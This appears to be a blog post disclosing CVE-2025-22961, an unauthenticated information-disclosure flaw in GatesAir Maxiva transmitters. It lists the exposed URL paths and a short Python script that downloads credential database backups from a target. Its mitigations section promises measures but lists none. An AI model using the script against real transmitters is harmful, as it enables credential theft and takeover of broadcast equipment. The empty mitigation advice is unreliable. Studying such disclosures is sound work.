CVE-2025-22961 - Critical Information Disclosure Vulnerability in GatesAir Maxiva UAXT, VAXT Transmitters: Exploiting Incorrect Access Control for Unauthorized Database Access

A critical information disclosure vulnerability (CVE-2025-22961) has been discovered in the web-based management interface of GatesAir Maxiva UAXT and VAXT transmitters. This vulnerability, caused by Incorrect Access Control (CWE-284), enables unauthenticated attackers to directly access sensitive database backup files (snapshot_users.db) via publicly exposed URLs (/logs/devcfg/snapshot/ and /logs/devcfg/user/). Exploiting this vulnerability can result in the retrieval of sensitive user data, including login credentials, which can potentially lead to a full system compromise. This blog post will delve into the details of the vulnerability, provide code snippets, and examine the potential risks posed by its exploitation.

Vulnerability Details

Product: GatesAir Maxiva UAXT, VAXT Transmitters
Affected Versions: All known versions
CVE ID: CVE-2025-22961
Risk Level: Critical
CWE Classification: CWE-284 (Incorrect Access Control)

The vulnerability is exploitable by simply accessing the following URLs without any authentication

- https://<IP_ADDRESS>/logs/devcfg/snapshot/
- https://<IP_ADDRESS>/logs/devcfg/user/

These URLs are publicly exposed, allowing anyone to download the sensitive database backup files (snapshot_users.db), which contain user credentials and other sensitive information.

Here's an example code snippet to demonstrate fetching the database file using Python

import requests

TARGET_IP = '192.168.1.10'  # Replace this with the target IP address

url1 = f"https://{TARGET_IP}/logs/devcfg/snapshot/";
url2 = f"https://{TARGET_IP}/logs/devcfg/user/";

response1 = requests.get(url1, verify=False)
response2 = requests.get(url2, verify=False)

if response1.status_code == 200:
    with open('snapshot_users1.db', 'wb') as file:
        file.write(response1.content)
if response2.status_code == 200:
    with open('snapshot_users2.db', 'wb') as file:
        file.write(response2.content)

Please note that the above code snippet is for demonstration purposes only and should not be used for malicious activities.

Original References

This vulnerability was discovered by security researchers and was reported to the appropriate authorities and the vendor. The details of the vulnerability can be found at the following sources:

- CVE-2025-22961 - National Vulnerability Database (NVD)
- CWE-284: Improper Access Control - Common Weakness Enumeration (CWE)

Mitigations

At the time of writing this blog post, there have been no patches or updates released by the vendor to address this vulnerability. However, as a temporary measure, users can implement the following mitigations to minimize the risk of exploitation:

Conclusion

The CVE-2025-22961 vulnerability in GatesAir Maxiva UAXT and VAXT transmitters' web-based management interface exposes sensitive information due to incorrect access control. Unauthenticated attackers can exploit this vulnerability to gain unauthorized access to sensitive database backup files, potentially leading to a full system compromise. Users should apply the recommended mitigations to minimize the risks associated with this vulnerability until a patch or update is released by the vendor.

Timeline

Published on: 02/13/2025 23:15:11 UTC
Last modified on: 03/12/2025 19:15:38 UTC